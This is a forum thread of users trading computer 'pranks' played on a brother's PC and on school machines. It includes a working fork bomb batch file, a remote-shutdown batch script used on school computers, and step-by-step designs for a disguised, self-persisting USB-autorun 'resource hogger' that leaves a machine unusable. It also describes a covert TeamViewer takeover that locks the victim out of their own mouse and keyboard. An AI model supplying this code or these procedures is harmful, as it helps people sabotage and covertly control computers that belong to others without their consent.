*Feels lke an idiot posting this*

ganzey

banned
what does a fork bomb do?

it repeatedly opens untill the computer crashes and must restart, doesnt do any harm to pc, but its annoying as hell. heres a simple one

m:
start fork.bat
start fork.bat
goto m

and then you save it as fork.bat, so it opens 2, and those each open 2, etc.

ganzey

banned
this is gonna be like a ticking time bomb, cause he always puts his pc on sleep mode and shuts down like once a week, the anticipation is almost killing me.

Stoic Sentinel

LOL, maybe you could "accidentally" hit the power button and run. Lock all your doors, but be sure to put in a deadlock for your room ;)

poke349

Subscribed :D

I know of (and done some) pretty nasty (but non-malicious) pranks. (and had plenty of them done to me)...

So if you need more ideas...
(btw, I'm a programmer, and I'm pretty good with WinAPI and accessing/messing with the system with just C++ ;))

Last edited:

Gooberman

Lol xD vb scripts I just looped some program to open lol

I'm going to use CD tray script at school tomorrow if no snow day >:]

Last edited:

poke349

Lol xD vb scripts I just looped some program to open lol

I'm going to use CD tray script at school tomorrow if no snow day >:)

The "nicer" things I've done would be fake BSOD screens, pop-up windows, and changing system sounds.

Probably the nastiest thing I've done is this:

A resource hogger.
What we'll (I've taught this to a few people), is write a program that will
do the following:

1. Copy itself to the hard drive. (specifically the startup folder)
2. Rename itself to some anti-virus program... (or anything that's trusted)
2. Launch the advanced computer settings window.
3. Pause
4. Allocate every single last byte of free space on the boot drive into a hidden file.
5. Then allocate memory equal to double the physical memory.

EDIT 2: I forgot a step:
6. Spawn as many threads as there are logical cores.
7. Have each thread go into an infinite loop that will random access the memory.

Now here's how we can trigger it in under 20 seconds:

1. Configure autoplay on a flash drive to launch the executable.
2. Insert the flash drive. It will autorun, copy itself, and launch advanced settings.
3. Manually set the pagefile to something very large. (I can't do this programmicly because of security measures in Windows.)
4. Restart the computer.

And that computer is basically done for...
EDIT: Without a separate boot drive, it would take hours to disable it because the system is non-responsive.

EDIT: This was payback for something REALLY nasty someone did to me...

Last edited:

Gooberman

Worst thing i've done is a batch file that remote shuts down computers xD

@Echo off
Echo remote shutdown
Echo ------------------------------------
:Main
Set /P Comp=Computer Name:
Set /P Time=Shutdown Time:
Set /P msg=Message:
Shutdown -m \\%Comp% -s -t %Time% -c "%msg%"
Echo ------------------------------------
GOTO Main

You could just do shutdown -i but i find my way easier

Only works with admin privilages (at my school xD)

Don't be immature with this! i was experimenting xD

Last edited:

poke349

Another thing you can do (but I haven't had the opportunity to do yet), is this:

1. Install TeamViewer.
2. Disable the drivers for the mouse + keyboard.
3. Disable the usb drivers.
(2 and 3 will have to be done remotely using teamviewer because you can't control the computer after you disable mouse and keyboard)
4. And watch as that person comes back.

You'll have full control over that computer and whoever is sitting in front of it will be completely helpless as they can see everything you are doing... but can't do a thing about it besides shutdown the computer via power switch...

poke349

lol...

If anyone understands how the resource hogger prank that I posted on the previous page works... you'll know how nasty that one truely is...

But anyhow, I'm not the kind who usually starts them, but I am known to go a little overboard with payback pranks...

Gooberman

i saw on youtube some guy changed the start up sounds to gun fire and cranked his vol. lol that's a prank!

Candy

Haha, you'd all better stop posting how to do some of these things or the thread may get locked and I want to know the outcome of ganzey's prank.

linkin

VIP Member
My brother use to do this sorta stuff.. fabe bsods and vake viruses (lots of multi coloured text in a CMD window. he spread it to every computer in the school library, and he got busted BIGTIME. i was laughing for days)

Gooberman

Well I don't do that lol in one of our labs everyone has admin privileges because of software problems and 3 people found out about remote shutdown! :/ well i owned them and denied them access to the exe :) and they are to dumb to unblock it so it's all good

ganzey

banned
well, today he restarted his pc, and he was pissed. but he went easy on me cause i was at the hospital at the time(cut off half my finger), and he offered me a truce when i got home if i would fix it. i only wish i could have seen his face when he first booted up.....